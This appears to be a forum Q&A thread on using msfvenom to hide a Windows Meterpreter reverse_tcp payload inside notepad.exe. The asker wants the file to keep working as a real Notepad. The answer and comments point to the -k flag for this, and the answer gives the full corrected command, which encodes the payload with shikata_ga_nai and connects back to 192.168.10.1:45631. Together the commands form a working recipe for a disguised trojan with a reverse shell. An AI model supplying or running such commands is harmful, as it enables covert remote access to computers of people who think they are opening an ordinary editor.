# How do I make this instruction using msfvenom?

Tags: metasploit

```
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -x /tmp/notepad.exe LHOST=192.168.10.1 LPORT=45631 -b
"\x00" -f exe-only > notepad.exe
```

and then if I download notepad.exe in Windows 7, I want to implement notepad.exe like a real notepad.exe ..... read and write and save also can hack using metasploit.

I tried to this instruction.
I download notepad.exe and implement .... but I received the message

[image]

Comment: Use -k flag and it will preserve the original functionality of the exe (in this case notepad.exe)

Comment: didn't i use the shellcode for likely to open real notepad?

Comment: i don't understand how to using -k flag

Comment: have you read any documentation on `-k`?

Answer (score 1):

Check out [this](https://www.offensive-security.com/metasploit-unleashed/msfvenom/) help.
You need to provide notepad.exe as template (-x) option and tell msfvenom to preserve the original template functions (-k) and inject payload as additional thread. So should be sth like

```
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -x /tmp/notepad.exe -k LHOST=192.168.10.1 LPORT=45631 -b "\x00" > notepad.exe
```